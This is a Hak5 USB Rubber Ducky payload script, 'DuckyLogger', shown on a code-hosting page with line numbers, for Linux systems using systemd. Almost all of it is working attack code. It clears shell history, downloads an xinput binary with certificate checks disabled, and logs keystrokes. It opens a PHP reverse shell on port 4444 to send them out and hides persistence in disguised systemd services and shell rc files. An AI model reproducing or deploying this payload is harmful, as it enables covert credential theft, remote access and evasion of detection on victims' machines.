Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/credentials/DuckyLogger/payload.txt
2968 views
1
REM Title: DuckyLogger

2
REM Description: Key logger which sends each and every key stroke of target remotely/locally.

3
REM AUTHOR: drapl0n

4
REM Version: 1.0

5
REM Category: Credentials

6
REM Target: Unix-like operating systems with systemd

7
REM Attackmodes: HID

8


9
REM [Note]

10
REM Visit https://github.com/drapl0n/DuckyLogger for usage and other important instructions.

11


12
REM [keeping tracks clear]

13
DELAY 500

14
CTRL-ALT t

15
DELAY 400

16
STRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE

17
ENTER

18
DELAY 100

19


20
REM [creating key logging mechanism]

21
STRING mkdir /var/tmp/.system

22
ENTER

23
DELAY 100

24
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys 

25
ENTER

26
DELAY 100

27
STRING chmod +x /var/tmp/.system/sys

28
ENTER

29
DELAY 100

30


31
REM [importing xinput]

32
STRING cd /var/tmp/.system/

33
ENTER

34
DELAY 100

35
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true

36
ENTER

37
DELAY 2500

38
STRING chmod +x xinput

39
ENTER

40
DELAY 100

41


42
REM [creating reverse shell]

43
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus

44
ENTER

45
DELAY 100

46
STRING chmod +x /var/tmp/.system/systemBus

47
ENTER

48
DELAY 100

49


50
REM [creating systemd service to execute payload on boot]

51
STRING mkdir -p ~/.config/systemd/user

52
ENTER

53
DELAY 200

54
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service

55
ENTER

56
DELAY 100

57


58
REM [creating reboot script incase if listner stops or targets internet connection gets lost] 

59
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot

60
ENTER

61
DELAY 100

62
STRING chmod +x /var/tmp/.system/reboot

63
ENTER

64
DELAY 100

65


66
REM [creating systemd service to execute payload on boot]

67
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service

68
ENTER

69
DELAY 100

70


71
REM [enabling service]

72
STRING systemctl --user daemon-reload

73
ENTER

74
DELAY 300

75
STRING systemctl --user enable --now systemBUS.service

76
ENTER

77
DELAY 150

78
STRING systemctl --user enable --now reboot.service

79
ENTER

80
DELAY 100

81


82
REM [autostarting service on terminal/shell launch]

83
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp

84
ENTER

85
DELAY 100

86
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

87
ENTER

88


89